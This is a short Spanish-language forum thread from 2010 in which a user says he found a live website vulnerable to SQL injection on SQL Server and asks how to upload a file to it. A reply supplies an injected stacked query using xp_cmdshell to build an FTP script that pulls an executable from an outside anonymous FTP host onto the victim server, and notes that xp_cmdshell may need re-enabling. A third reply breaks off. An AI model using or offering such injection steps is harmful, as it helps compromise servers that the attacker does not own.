Título: Pregunta sobre inyeccion sqlserver. Publicado por: PHAMTOM en 18 Febrero 2010, 04:07 am Buenas,encontré una pagina vulnerable a sql inyection,SQLSERVER.-
quisiera saber si hay algun metodo , que con la inyeccion subir un archivo de mi pc , al pc remoto vulnerable.. La inyeccion la hago por un formulario..- Saludos,PHAMTOM Título: Re: Pregunta sobre inyeccion sqlserver. Publicado por: nacho87 en 19 Febrero 2010, 09:16 am En el remoto caso de que el user sea admin y la inyección permita stacked querys puedes hacer:
Código: ;master..xp_cmdshell 'cmd /c echo get archivo.exe>asd.txt'; Asi te conectas al server anonimo ftp.anonimo.com y te descargas el archivo archivo.exe. Si la BBDD es mssql server 2005 puede que tengas que reactivar el xp_cmdshell. Busca en internet como se hace que ahora mismo no me acuerdo.jeje. son un par de comandos más. Saludos!! Título: Re: Pregunta sobre inyeccion sqlserver. Publicado por: Shell Root en 19 Febrero 2010, 19:20 pm Creo que es...
Código
|